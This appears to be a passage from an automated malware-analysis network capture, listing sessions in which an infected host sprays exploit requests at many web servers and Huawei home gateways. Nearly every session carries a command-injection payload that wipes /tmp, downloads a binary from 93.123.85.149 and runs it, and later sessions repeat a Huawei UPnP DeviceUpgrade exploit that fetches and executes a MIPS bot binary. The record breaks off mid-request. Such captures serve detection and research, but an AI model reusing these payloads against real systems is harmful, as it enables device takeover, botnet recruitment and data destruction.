                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 61 35 32 31 33 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 33 26 23 34 36 3b 31 65 32 32 39 30 39 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5a521302&#46;1706279493&#46;1e229090</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            140192.168.2.235503023.77.215.3980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.402143002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.736813068 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 61 35 37 33 32 62 38 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 35 26 23 34 36 3b 31 39 62 61 30 38 64 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9a5732b8&#46;1706279495&#46;19ba08de</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            141192.168.2.235034023.20.38.180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.517956972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.637797117 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            142192.168.2.2334900192.249.112.17780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.552555084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.703475952 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            143192.168.2.2333460149.12.212.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.603929043 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.808789015 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:27:08 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            144192.168.2.235337034.110.219.24080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.621310949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            145192.168.2.235576818.118.223.18180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.676752090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.800901890 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            146192.168.2.233982423.50.76.15980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.677290916 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.801964045 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 65 37 38 63 65 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 35 26 23 34 36 3b 34 33 62 63 32 39 36 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4e78ce17&#46;1706279495&#46;43bc296f</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            147192.168.2.2342292184.86.0.8080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.809762955 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:36.012751102 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 36 66 30 31 35 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 35 26 23 34 36 3b 31 36 63 35 31 35 39 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;26f01502&#46;1706279495&#46;16c5159e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            148192.168.2.2353294121.29.56.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.873162985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            149192.168.2.2343492156.241.113.2937215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.972750902 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:37.638562918 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:39.622360945 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:43.589740038 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
